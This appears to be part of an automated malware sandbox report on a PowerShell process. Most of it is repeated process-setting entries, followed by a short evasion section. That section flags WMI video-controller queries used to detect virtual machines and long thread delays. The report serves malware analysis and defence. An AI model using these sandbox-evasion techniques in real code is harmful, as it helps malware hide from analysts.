Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4550Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5194Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1097Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 751Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4335Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5447Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1055
